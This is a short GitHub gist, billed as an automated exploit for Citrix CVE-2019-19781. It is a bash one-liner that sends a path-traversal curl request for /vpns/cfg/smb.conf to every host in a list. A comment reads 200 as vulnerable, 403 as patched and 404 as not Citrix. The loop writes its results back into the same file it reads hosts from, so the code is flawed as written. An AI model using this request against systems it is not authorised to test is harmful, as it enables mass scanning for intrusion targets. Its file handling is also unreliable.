Skip to content

Instantly share code, notes, and snippets.

@nuryslyrt
Created January 21, 2020 21:21
Show Gist options
  • Save nuryslyrt/1aa36194bcb67ee63bf18282bdd417d8 to your computer and use it in GitHub Desktop.
Save nuryslyrt/1aa36194bcb67ee63bf18282bdd417d8 to your computer and use it in GitHub Desktop.
Citrix CVE-2019-19781 Automated Exploit
for i in `cat citrix.txt`;do curl -s -o /dev/null -w "%{remote_ip} %{http_code}\n" -k --path-as-is https://$i/vpn/../vpns/cfg/smb.conf>>citrix.txt;done
@nuryslyrt
Copy link
Author

  • If the response code is 200, the target is vulnerable.
  • If the response code is 403, the target is patched.
  • If the response code is 404, the target is not Citrix.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment